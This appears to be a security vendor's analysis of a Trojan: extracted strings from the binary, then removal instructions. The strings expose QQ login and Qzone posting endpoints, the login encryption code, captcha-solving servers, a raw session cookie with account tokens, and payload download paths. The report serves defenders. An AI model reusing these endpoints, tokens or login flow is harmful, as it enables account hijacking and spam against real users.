[%d]received: seq=%lu, cmd=%lu, rsp=%d
[%d]RequestDecode no record: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no ResultSeq2DecSeq: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no record: seq=%lu, cmd=%lu, rsp=%d
[%d]SetReqSeqNoData failed(seq=%lu, cmd=%lu, rsp=%d)
[%d]Data sent(len=%d)
[%d]socket closed
CrackCaptcha.log
CrackCaptcha_bak.log
d-d-d d:d:d.d
[%d]request: seq=%lu, cmd=%lu
[%d]Pack error
[%d]Add Send Data error
Create Packet Writer failed(cmd=%lu)
socket connector connect failed(%s)
Inner login failed
server1.dama2.com
server.dama2.com
RetFileNameLen(%d) <= dwPrexLen(%d) or url(%s) not include prex
Get Var memory failed(len=%d)
SOCKFILE://%s/%s
[%d]call PacketBuiler.Pack failed(seq=%lu,cmd=%lu)
call BlockingClientSocket.Connect failed(ip=%s)
call BlockingClientSocket.Send failed(len=%d)
call BlockingClientSocket.Receive failed(recvlen=%d, left=%d)
recv data(len= %d)
Packet Length error(recvlen=%d)
call PackBuilder.Unpack failed
RespCode=%d
File Server IP error(filename=%s)
Start download file(%s)
failed to download file(%s, used %dms)
succeed to download file(%s, used %dms)
Get Var Memory failed(len=%d)
call DownloadFile(%s) failed
call FileOp.DownloadFile(%s) failed
\Install.exe
CreateFile(%s) failed(err=%d)
WriteFile(%s,len=%d) failed(err=%d)
download file from internet failed(%s)
Failed to DownloadFile(%s, resp=%d)
Picture file name Count = 0(%s)
Picture (%s) is invalid(%s)
Picture Count = 0(%s)
failed to encode dest image (%s)
Send HeatBeat init failed(resp=%d, usedtime=%dms)
Send HeatBeat failed(resp=%d, usedtime=%dms)
Send HeatBeat success(seq=%d, usedtime=%dms)
worker socket sleep timeout:%d
WSAEnumNetworkEvents(s=%d, event=%d) failed(err=%d)
close event waited[events.lNetworkEvents & FD_CLOSE)=%d, err=%d]
[%7lu]send(sock=%d, len=%d) failed(err=%d)
[%7lu]recv(sock=%d, len=%d) failed(err=%d)
OnSocketDataReceived return %d
CrackCaptchaAPI.log
CrackCaptchaAPI_bak.log
Failed to CreateFile(%s): error=%d
Failed to GetFileSize(%s): dwLen=%d
Failed to ReadFile(%s): error=%d
Failed to ReadFile(%s): Len=0
Failed to EncodeImage(%s)
C:\work\VCodeServer\Release\CrackCaptchaAPI.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
ADVAPI32.dll
InternetOpenUrlA
WININET.dll
IPHLPAPI.DLL
WS2_32.dll
GetCPInfo
PeekNamedPipe
Login2
ReportResult
zcÁ
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
.?AUILogInterface@@
.?AVCServerFileOperateThread@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
/Cookies.ini
/shuoshuo.ini
/YZM/1.asp
/a/shuoshuo.asp
/a/fangketiqu.asp
/a/2.asp
/a/3.asp
/a/5.asp
@Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
hXXp://
WinHttp.WinHttpRequest.5.1
MSXML2.ServerXMLHTTP.6.0
MSXML2.ServerXMLHTTP.5.0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
hXXps://
KERNEL32.DLL
COMCTL32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
SkinH_EL.dll
c:\delus.bat
RK=RIuSfMSUMX; pgv_pvi=4724880384; ptui_loginuin=595768047; pgv_pvid=8433761074; pgv_flv=11.7 r700; itkn=1899609403; ptisp=; ptcz=f4b1ea9dd4fd9cc4fff96027d95467c74c19e859473ed150c468cbcd0776a81d; pt2gguin=o0595768047; uin=o0595768047; skey=@3XHq5M5NV
hXXp://cgi.find.qq.com/qqfind/buddy/possiblev
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
return binl2hex(core_md5(str2binl(A), A.length * chrsz))
return binl2str(core_md5(str2binl(A), A.length * chrsz))
for (var C = 0; C < K.length; C  = 16) {
for (var B = 0; B < D.length * chrsz; B  = chrsz) {
C[B >> 5] |= (D.charCodeAt(B / chrsz) & A) << (B % 32)
for (var B = 0; B < C.length * 32; B  = chrsz) {
D  = String.fromCharCode((C[B >> 5] >>> (B % 32)) & A)
for (var A = 0; A < C.length * 4; A  ) {
D  = B.charAt((C[A >> 2] >> ((A % 4) * 8   4)) & 15)   B.charAt((C[A >> 2] >> ((A % 4) * 8)) & 15)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
return(Math.random());
return(date.getTime());
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&pt_qzone_sig=1&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=
&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html
login_sig:"
&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=
&js_type=1&login_sig=
hXXp://check.ptlogin
hXXp://captcha.qq.com/getimage?uin=
while (z   aB < aA.length) {
t  = aA.substring(z, z   aB)   '\n';
return t   aA.substring(z, aA.length)
return '0'   t.toString(16)
return t.toString(16)
if (aE < aB.length   11) {
var aA = aB.length - 1;
var aC = aB.charCodeAt(aA--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = af(aA, (this.n.bitLength()   7) >> 3);
var aB = this.doPublic(t);
var z = aB.toString(16);
if ((z.length & 1) == 0) {
L.prototype.doPublic = W;
L.prototype.setPublic = o;
L.prototype.encrypt = p;
this.fromNumber(z, t, aA)
this.fromString(z, 256)
this.fromString(z, t)
aE = Math.floor(aA / 67108864);
ar.prototype.am = ay;
ar.prototype.DB = aw;
ar.prototype.DM = ((1 << aw) - 1);
ar.prototype.DV = (1 << aw);
ar.prototype.FV = Math.pow(2, aa);
ar.prototype.F1 = aa - aw;
ar.prototype.F2 = 2 * aw - aa;
ap = '0'.charCodeAt(0);
ap = 'a'.charCodeAt(0);
ap = 'A'.charCodeAt(0);
return ae.charAt(t)
var aA = ag[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aE, z);
var aD = aE.length,
if (aE.charAt(aD) == '-') {
if (aC   aB > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aC)) - 1)) << aC;
this[this.t  ] = (t >> (this.DB - aC))
if (aC >= this.DB) {
aC -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aC)) - 1) << aC
this.clamp();
ar.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate() .toString(z)
return this.toRadix(z)
var aE = this.DB - (aB * this.DB) % aA;
if (aE < this.DB && (aF = this[aB] >> aE) > 0) {
aF |= this[--aB] >> (aE  = this.DB - aA)
aE  = this.DB;
ar.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   j(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aA, 0);
var z = aF % this.DB;
var t = this.DB - z;
var aC = Math.floor(aF / this.DB),
aE = (this.s << z) & this.DM,
aB.clamp()
var aC = Math.floor(aE / this.DB);
var z = aE % this.DB;
t = Math.min(z.t, this.t);
aB[aA  ] = aC & this.DM;
aC >>= this.DB
aB[aA  ] = aC & this.DM;
aC >>= this.DB
aB[aA  ] = this.DV   aC
var t = this.abs(),
aC = z.abs();
aB[aA   t.t] = t.am(0, aC[aA], aB, aA, 0, t.t)
aB.clamp();
ar.ZERO.subTo(aB, aB)
var t = this.abs();
var aB = t.am(z, t[z], aA, 2 * z, 0, 1);
if ((aA[z   t.t]  = t.am(z   1, 2 * t[z], aA, 2 * z   1, aB, t.t - z - 1)) >= t.DV) {
aA[z   t.t] -= t.DV;
aA[aA.t - 1]  = t.am(z, t[z], aA, 2 * z, 0, 1)
aA.clamp()
var aO = aI.abs();
var aG = this.abs();
aF.fromInt(0)
this.copyTo(aE)
var aN = this.DB - j(aO[aO.t - 1]);
aO.lShiftTo(aN, aC);
aG.lShiftTo(aN, aE)
aO.copyTo(aC);
aG.copyTo(aE)
var aR = this.FV / aJ,
aC.dlShiftTo(aL, aD);
if (aE.compareTo(aD) >= 0) {
aE.subTo(aD, aE)
ar.ONE.dlShiftTo(aK, aD);
aD.subTo(aC, aC);
var aB = (aE[--aM] == aA) ? this.DM : Math.floor(aE[aM] * aR   (aE[aM - 1]   aP) * aQ);
if ((aE[aM]  = aC.am(0, aB, aE, aL, 0, aK)) < aB) {
aC.dlShiftTo(aL, aD);
aE.subTo(aD, aE);
aE.subTo(aD, aE)
aE.drShiftTo(aK, aF);
ar.ZERO.subTo(aF, aF)
aE.clamp();
aE.rShiftTo(aN, aE)
ar.ZERO.subTo(aE, aE)
this.abs() .divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(ar.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aA, z);
this.reduce(z)
t.squareTo(z);
K.prototype.convert = V;
K.prototype.revert = ak;
K.prototype.reduce = J;
K.prototype.mulTo = H;
K.prototype.sqrTo = au;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z : - z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs() .dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(ar.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aB = (z * this.mpl   (((z * this.mph   (t[aA] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aB, t, aA, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
f.prototype.convert = aj;
f.prototype.revert = at;
f.prototype.reduce = P;
f.prototype.mulTo = y;
f.prototype.sqrTo = am;
return ar.ONE
aD = aG.convert(this),
aD.copyTo(aE);
aG.sqrTo(aE, aA);
aG.mulTo(aA, aD, aE)
return aG.revert(aE)
if (aA < 256 || t.isEven()) {
return this.exp(aA, aB)
ar.prototype.copyTo = Y;
ar.prototype.fromInt = n;
ar.prototype.fromString = w;
ar.prototype.clamp = O;
ar.prototype.dlShiftTo = aq;
ar.prototype.drShiftTo = X;
ar.prototype.lShiftTo = s;
ar.prototype.rShiftTo = l;
ar.prototype.subTo = ab;
ar.prototype.multiplyTo = D;
ar.prototype.squareTo = Q;
ar.prototype.divRemTo = E;
ar.prototype.invDigit = B;
ar.prototype.isEven = i;
ar.prototype.exp = x;
ar.prototype.toString = q;
ar.prototype.negate = R;
ar.prototype.abs = al;
ar.prototype.compareTo = G;
ar.prototype.bitLength = u;
ar.prototype.mod = N;
ar.prototype.modPowInt = an;
ar.ZERO = c(0);
ar.ONE = c(1);
d(new Date() .getTime())
m.init(U);
for (ac = 0; ac < U.length;   ac) {
return m.next()
for (t = 0; t < z.length;   t) {
ad.prototype.nextBytes = av;
z = (z   this.S[aB]   aC[aB % aC.length]) & 255;
k.prototype.init = e;
k.prototype.next = a;
t.setPublic(aA, z);
return t.encrypt(aB)
return Math.round(Math.random() * 4294967295)
for (var z = 0; z < B.length; z  ) {
var A = Number(B[z]) .toString(16);
if (A.length == 1) {
for (var y = 0; y < z.length; y  = 2) {
A  = String.fromCharCode(parseInt(z.substr(y, 2), 16))
for (var y = 0; y < A.length; y  ) {
z[y] = A.charCodeAt(y)
var y = A.length;
var y = C.length;
for (var A = 0; A < z.length; A  ) {
var y = s.length;
for (var z = 0; z < C.length; z  ) {
A[z] = C.charCodeAt(z) & 255
for (var z = 0; z < C.length; z  = 2) {
A[y  ] = parseInt(C.substr(z, 2), 16)
for (var z = 0; z < A.length; z  ) {
y  = String.fromCharCode(A[z])
return d.encode(y)
initkey: function (y, z) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function (A, z) {
var y = A.charCodeAt(z);
d.encode = function (C) {
if (arguments.length != 1) {
var z = d.PADCHAR;
var E = d.ALPHA;
var D = d.getbyte;
var A = C.length - C.length % 3;
if (C.length == 0) {
y.push(E.charAt(F >> 18));
y.push(E.charAt((F >> 12) & 63));
y.push(E.charAt((F >> 6) & 63));
y.push(E.charAt(F & 63))
switch (C.length - A) {
y.push(E.charAt(F >> 18)   E.charAt((F >> 12) & 63)   z   z);
y.push(E.charAt(F >> 18)   E.charAt((F >> 12) & 63)   E.charAt((F >> 6) & 63)   z);
return y.join('')
if (!csza.btoa) {
csza.btoa = d.encode
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
var hex = str.toString(16);
var len = hex.length;
arr.push("\\x"   hex.substr(j, 2))
var result = arr.join("");
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password : md5(password),
rsaH1Len = (rsaH1.length / 2) .toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
'/': '-',
' ': '*',
'=': '_'
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=
com/login?u=
hXXp://ptlogin
function time(){return Math.random()}
function time(){return new Date().getTime()}
|*.txt
/shua/wangzhi.asp
VVV.baidu.com
&SQL=
19,91,01,22,52,07
z>&qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/qzone/sync.html
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_signset?g_tk=
hXXp://user.qzone.qq.com/
/311
&code_version=1&format=fs&qzreferrer=http://user.qzone.qq.com/
syn_tweet_verson=1&paramstr=1&pic_template=&richtype=&richval=&special_url=&subrichtype=&con=
Content-Disposition: form-data; name="skey"
skey
1.jpg
Content-Disposition: form-data; name="filename"; filename="1.jpg"
skey=
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
&special_url=&subrichtype=1&pic_bo=
hXXp://user.qzone.qq.com/q/taotao/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://captcha.qq.com/getimage?aid=8000102&r=0.
/taotao&verify=
syn_tweet_verson=1&paramstr=1&pic_template=&richtype=&richval=&special_url=&subrichtype=&con=qm
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
`~!@#$%^&*()-_= [{]};:'\|,<.>/?"
hXXp://VVV.baidu.com
hXXp://VVV.sogou.com
hXXp://VVV.qq.com
\fangkedl.txt
\\.\PHYSICALDRIVE
\\.\SCSI
\\.\SMARTVSD
A\\.\PhysicalDrive0
&Site=jfnn.com&Menu=yes
¸öÈËÈÕ¼Ç
VVV.dama2.com
hXXp://VVV.dama2.com
(*.bmp;*.jpg;*.gif;*.tiff)|*.bmp;*.jpg;*.gif;*.tiff
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
VERSION.dll
RASAPI32.dll
WinExec
GetWindowsDirectoryA
GetKeyState
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
oledlg.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
CreateDialogIndirectParamA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
(%d-%d):
VVV.dywt.com.cn
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
(*.htm;*.html)|*.htm;*.html
msctls_hotkey32
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
hXXp://VVV.12345ee.com
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.4.2.0
CrackCaptchAPI.dll
1, 0, 6, 6
- Skin.dll
(*.*)
1.0.0.0
(hXXp://VVV.eyuyan.com)

%original file name%.exe_464_rwx_10000000_0003E000:

`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
    C:\CrackCaptchaAPI.dll (7972 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@12345ee[1].txt (201 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].txt (1560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
